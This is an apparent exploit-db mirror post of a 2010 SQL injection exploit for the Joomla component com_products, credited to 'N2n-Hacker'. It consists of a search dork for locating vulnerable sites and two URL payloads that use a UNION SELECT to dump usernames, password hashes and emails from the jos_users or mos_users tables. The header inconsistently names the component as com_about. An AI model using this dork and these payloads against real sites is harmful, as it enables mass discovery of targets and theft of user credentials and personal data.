Joomla! Component com_products – ‘intCategoryId’ SQL Injection

  • 作者: N2n-Hacker
    日期: 2010-03-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11691/
  • # Title : Joomla com_products 'intCategoryId' Remote Sql Injection Vulnerability
    # Date : 2010-03-11
    # Author : N2n-Hacker
    # Script: [Joomla]--
    # Founder:[ N2n-Hacker --Email:2nd@live.fr<mailto:Email%3A2nd@live.fr>]--
    
    ==============================================================================
    \\\\\\\\\\ Joomla com_about 'intCategoryId' Remote Sql Injection Vulnerability /////////
    ==============================================================================
    
    ***************************************************************************
    Dork = inurl:com_products "intCategoryId"
    ###########################################################################
     ===[ Exploit ]===
    
    => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+jos_users&op=category_details
    or
    => http://website/index.php?option=com_products&intCategoryId=-222 UnIon SelEct 1,2,group_concat(username,0x3a,password,0x3a,email),4,5,6,7,8+from+mos_users&op=category_details
    
    ###########################################################################
    My Bad Life
    ###########################################################################